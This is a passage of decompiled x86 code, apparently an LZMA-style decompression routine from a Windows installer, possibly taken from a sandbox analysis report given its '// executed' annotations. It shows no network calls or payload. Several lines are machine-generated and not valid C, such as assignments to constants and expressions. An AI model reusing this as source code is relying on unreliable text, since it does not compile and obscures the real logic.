                    								 *_t487 =  *(_t644 - 0x48) - 1;
                    								L149:
                    								if( *(_t644 - 0x48) <= 0) {
                    									goto L155;
                    								}
                    								goto L150;
                    							} else {
                    								L154:
                    								L146:
                    								if( *(_t644 - 0x6c) == 0) {
                    									L169:
                    									 *(_t644 - 0x88) = 0x18;
                    									L170:
                    									_t579 = 0x22;
                    									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                    									_t539 = 0;
                    									L172:
                    									return _t539;
                    								}
                    								L147:
                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                    								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    								_t484 = _t644 - 0x70;
                    								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    								goto L148;
                    							}
                    							L155:
                    							_t537 =  *(_t644 - 0x7c);
                    							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                    							while(1) {
                    								L140:
                    								 *(_t644 - 0x88) = _t537;
                    								while(1) {
                    									L1:
                    									_t538 =  *(_t644 - 0x88);
                    									if(_t538 > 0x1c) {
                    										break;
                    									}
                    									L2:
                    									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                    										case 0:
                    											L3:
                    											if( *(_t644 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											L4:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											_t538 =  *( *(_t644 - 0x70));
                    											if(_t538 > 0xe1) {
                    												goto L171;
                    											}
                    											L5:
                    											_t542 = _t538 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t581);
                    											_push(9);
                    											_pop(_t582);
                    											_t638 = _t542 / _t581;
                    											_t544 = _t542 % _t581 & 0x000000ff;
                    											asm("cdq");
                    											_t633 = _t544 % _t582 & 0x000000ff;
                    											 *(_t644 - 0x3c) = _t633;
                    											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                    											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                    											_t641 = (0x300 << _t633 + _t638) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                    												L10:
                    												if(_t641 == 0) {
                    													L12:
                    													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                    													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
                    													L11:
                    													_t641 = _t641 - 1;
                    													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                    												} while (_t641 != 0);
                    												goto L12;
                    											}
                    											L6:
                    											if( *(_t644 - 4) != 0) {
                    												GlobalFree( *(_t644 - 4));
                    											}
                    											_t538 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t644 - 4) = _t538;
                    											if(_t538 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t644 - 0x6c);
                    											if( *(_t644 - 0x6c) == 0) {
                    												L157:
                    												 *(_t644 - 0x88) = 1;
                    												goto L170;
                    											}
                    											L14:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											_t45 = _t644 - 0x48;
                    											 *_t45 =  *(_t644 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t644 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											L16:
                    											_t550 =  *(_t644 - 0x40);
                    											if(_t550 ==  *(_t644 - 0x74)) {
                    												L20:
                    												 *(_t644 - 0x48) = 5;
                    												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											L17:
                    											 *(_t644 - 0x74) = _t550;
                    											if( *(_t644 - 8) != 0) {
                    												GlobalFree( *(_t644 - 8));
                    											}
                    											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                    											 *(_t644 - 8) = _t538;
                    											if(_t538 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                    											 *(_t644 - 0x84) = 6;
                    											 *(_t644 - 0x4c) = _t557;
                    											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                    											goto L132;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t644 - 0x6c);
                    											if( *(_t644 - 0x6c) == 0) {
                    												L158:
                    												 *(_t644 - 0x88) = 3;
                    												goto L170;
                    											}
                    											L22:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											_t67 = _t644 - 0x70;
                    											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    											L23:
                    											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                    											if( *(_t644 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t559 =  *_t642;
                    											_t626 = _t559 & 0x0000ffff;
                    											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                    											if( *(_t644 - 0xc) >= _t596) {
                    												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                    												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                    												 *(_t644 - 0x40) = 1;
                    												_t560 = _t559 - (_t559 >> 5);
                    												__eflags = _t560;
                    												 *_t642 = _t560;
                    											} else {
                    												 *(_t644 - 0x10) = _t596;
                    												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                    												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                    											}
                    											if( *(_t644 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											} else {
                    												goto L137;
                    											}
                    										case 5:
                    											L137:
                    											if( *(_t644 - 0x6c) == 0) {
                    												L168:
                    												 *(_t644 - 0x88) = 5;
                    												goto L170;
                    											}
                    											L138:
                    											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    											L139:
                    											_t537 =  *(_t644 - 0x84);
                    											L140:
                    											 *(_t644 - 0x88) = _t537;
                    											goto L1;
                    										case 6:
                    											L25:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L36:
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											L26:
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												L35:
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												L32:
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											L66:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												L68:
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											L67:
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											goto L132;
                    										case 8:
                    											L70:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xa;
                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    											} else {
                    												__eax =  *(__ebp - 0x38);
                    												__ecx =  *(__ebp - 4);
                    												__eax =  *(__ebp - 0x38) + 0xf;
                    												 *(__ebp - 0x84) = 9;
                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    											}
                    											goto L132;
                    										case 9:
                    											L73:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L90;
                    											}
                    											L74:
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											L75:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t259;
                    											0 | _t259 = _t259 + _t259 + 9;
                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    											goto L76;
                    										case 0xa:
                    											L82:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L84:
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											L83:
                    											__eax =  *(__ebp - 0x28);
                    											goto L89;
                    										case 0xb:
                    											L85:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L89:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L90:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L99:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L164:
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											L100:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t334 = __ebp - 0x70;
                    											 *_t334 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t334;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L101;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L159:
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											L38:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											L40:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												L45:
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L160:
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											L47:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												L49:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													L53:
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L161:
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											L59:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												L65:
                    												goto L58;
                    											}
                    										case 0x10:
                    											L109:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L165:
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											L110:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t365 = __ebp - 0x70;
                    											 *_t365 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t365;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L111;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											goto L132;
                    										case 0x12:
                    											L128:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L131:
                    												__eax =  *(__ebp - 0x58);
                    												 *(__ebp - 0x84) = 0x13;
                    												__esi =  *(__ebp - 0x58) + 2;
                    												L132:
                    												 *(_t644 - 0x54) = _t642;
                    												goto L133;
                    											}
                    											L129:
                    											__eax =  *(__ebp - 0x4c);
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											__eflags = __eax;
                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                    											goto L130;
                    										case 0x13:
                    											L141:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L143:
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												L144:
                    												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                    												L145:
                    												 *(_t644 - 0x50) = 1;
                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    												goto L149;
                    											}
                    											L142:
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											L130:
                    											 *(__ebp - 0x58) = __eax;
                    											 *(__ebp - 0x40) = 3;
                    											goto L144;
                    										case 0x14:
                    											L156:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											while(1) {
                    												L140:
                    												 *(_t644 - 0x88) = _t537;
                    												goto L1;
                    											}
                    										case 0x15:
                    											L91:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L120;
                    										case 0x16:
                    											goto L0;
                    										case 0x17:
                    											while(1) {
                    												L145:
                    												 *(_t644 - 0x50) = 1;
                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    												goto L149;
                    											}
                    										case 0x18:
                    											goto L146;
                    										case 0x19:
                    											L94:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												L98:
                    												 *(__ebp - 0x2c) = __ebx;
                    												L119:
                    												_t393 = __ebp - 0x2c;
                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t393;
                    												L120:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													L166:
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												L121:
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												L122:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t400 = __ebp - 0x60;
                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t400;
                    												goto L123;
                    											}
                    											L95:
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												L97:
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L102:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													L107:
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L108:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L112:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														L118:
                    														_t391 = __ebp - 0x2c;
                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t391;
                    														goto L119;
                    													}
                    													L113:
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
